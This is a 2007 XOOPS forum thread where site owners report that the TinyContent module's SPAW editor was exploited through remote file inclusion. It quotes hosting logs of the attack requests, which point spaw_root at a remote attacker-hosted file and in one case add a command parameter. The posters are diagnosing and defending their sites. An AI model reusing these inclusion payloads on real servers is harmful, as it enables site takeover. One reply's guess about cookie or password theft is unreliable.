1
Rednecktek
TinyContent appears to be exploitable
  • 2007/5/2 15:39

  • Rednecktek

  • Just popping in

  • Posts: 4

  • Since: 2004/5/14


I have just received notice from my hosting provider that the tinycontent module in my installation was hacked and used to install software on my site. I am not qualified to determine if tinycontent is exploitable; I am recommending someone take a look at it.

Here is the info from my host:
------------------------------------------------------------------------------
Hello,

We need to inform you that your hosting account for [protected].com has been hacked and used to run illegal software on the server.

To prevent further abuse of your account and the server, we have disabled the following location on your account:

/home/[protected]/www/www/modules/tinycontent

Here is how the hackers have exploited your account:

62.193.230.18 - - [02/May/2007:12:31:16 +0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/sky/out2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65

Please check the environmental variables of the process for your user:

PATH=/usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT=/home/[protected]/www/www
HTTP_CONNECTION=close
HTTP_HOST=www.[protected].com
HTTP_USER_AGENT=libwww-perl/5.65
REMOTE_ADDR=62.193.230.18
REMOTE_PORT=59296
SCRIPT_FILENAME=/home/[protected]/www/www/modules/tinycontent/admin/spaw/spaw_control.class.php
SERVER_ADDR=[protected]
SERVER_ADMIN=admin@[protected].com
SERVER_NAME=www.[protected].com
SERVER_PORT=80
SERVER_SOFTWARE=Apache
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
QUERY_STRING=spaw_root=http://www.cabulas.net/sky/sky/out2.txt?
REQUEST_URI=/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/sky/out2.txt?
SCRIPT_NAME=/modules/tinycontent/admin/spaw/spaw_control.class.php

Please upgrade any third party software you are using on your account to the latest versions. Also, if you are using any custom scripts, please secure them as soon as possible.

When you are ready to secure your account, please contact us, and we will enable the access to the disabled directory.

Thank you!

2
davidl2
Re: TinyContent appears to be exploitable
  • 2007/5/2 16:04

  • davidl2

  • XOOPS is my life!

  • Posts: 4843

  • Since: 2003/5/26


It may be worth replacing TinyContent with either: TinyD or pico from http://xoops.peak.ne.jp/

(TinyD is a duplicatable module based on TinyContent, but Pico replaces TinyD as it has more features)

And I would also suggest looking at "Protector" from the above site as well.

3
riosoft
Re: TinyContent appears to be exploitable
  • 2007/5/2 17:42

  • riosoft

  • Not too shy to talk

  • Posts: 191

  • Since: 2003/11/8


Read about this known 2.0.16 bug info before install it!

bug 2.0.15/16
...

4
skenow
Re: TinyContent appears to be exploitable
  • 2007/5/2 18:18

  • skenow

  • Home away from home

  • Posts: 993

  • Since: 2004/11/17


Quote:

Rednecktek wrote:


Here is the info from my host:
------------------------------------------------------------------------------
Hello,


62.193.230.18 - - [02/May/2007:12:31:16 +0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/sky/out2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65


I believe this is a good example of why allow_url_fopen can be dangerous

5
skenow
Re: TinyContent appears to be exploitable
  • 2007/5/2 18:19

  • skenow

  • Home away from home

  • Posts: 993

  • Since: 2004/11/17


Quote:

riosoft wrote:
Read about this known 2.0.16 bug info before install it!

bug 2.0.15/16


This is an incompatibility between 2.0.15/2.0.16 and some of GiJoe's modules

6
JCDunnart
Re: TinyContent appears to be exploitable
  • 2007/5/2 18:59

  • JCDunnart

  • Not too shy to talk

  • Posts: 114

  • Since: 2006/7/1 5


What is 'spaw'? Is that an editor? If so, I think you can probably use a different one, or just use the default XOOPS editor.

7
skenow
Re: TinyContent appears to be exploitable
  • 2007/5/2 20:05

  • skenow

  • Home away from home

  • Posts: 993

  • Since: 2004/11/17


Quote:

JCDunnart wrote:
What is 'spaw'? Is that an editor? If so, I think you can probably use a different one, or just use the default XOOPS editor.


Yes, Spaw is a WYSIWYG editor - it hasn't been maintained separately for quite a while.

8
gestroud
Re: TinyContent appears to be exploitable
  • 2007/5/3 23:20

  • gestroud

  • Home away from home

  • Posts: 1538

  • Since: 2004/12/22


Just got this message from my webhost giving me essentially the same warning:

xxx.xx.xxx.xx - - [01/May/2007:20:53:29 -0400"GET
/modules/tinycontent/admin/s
paw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/c/tool25
.dat?&cm
d=idr HTTP/1.0" 
200 12453 xxx.com "-" "DataCha0s/2.0" "-"


This is a XOOPS 2.2 site with protector installed. Looks like tinycontent might have to be removed from the module repository. It might also be a good idea to put a warning on the xoops.org homepage warning users.

9
onasre
Re: TinyContent appears to be exploitable
  • 2007/5/4 4:38

  • onasre

  • Not too shy to talk

  • Posts: 150

  • Since: 2006/8/12


Listen Man

There is no problem with your module tinycontent , your problem with the Editor Spaw . the one trys to hack you he is doing it by tring to either steal the admin Hash Password or Steal your Cookies . this kind of attack most uses aginst phpnuke .

its seems somone Got Bug discovered on SPAW and now he tring to use it with any module uses this Editor you just disable it from your admin panel then go to the module and open admin folder u will see SPAW folder sleeping there , Remove it and just use microsoft front page to edit whatever u want to wrap inside XOOPS then copy and past to the default editor comes with the module .

i never trusted Spaw editor becose i always felt somone can insert Java Code and hack me .
Whatever Hits You , Never was to Mess you , and Whatever Messed U , Never Was to Hit You.

10
gestroud
Re: TinyContent appears to be exploitable
  • 2007/5/4 5:04

  • gestroud

  • Home away from home

  • Posts: 1538

  • Since: 2004/12/22


OK, I listened man, and I dig you, daddy-o But as long as the spaw editor is part of tinycontent, it's considered part of the module and its installation. In view of the recent attacks, I still think that a warning should be set up somewhere to alert members as well as the solution you provided.

Peace/Out

Login

Who's Online

394 user(s) are online (301 user(s) are browsing Support Forums)


Members: 0


Guests: 394


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits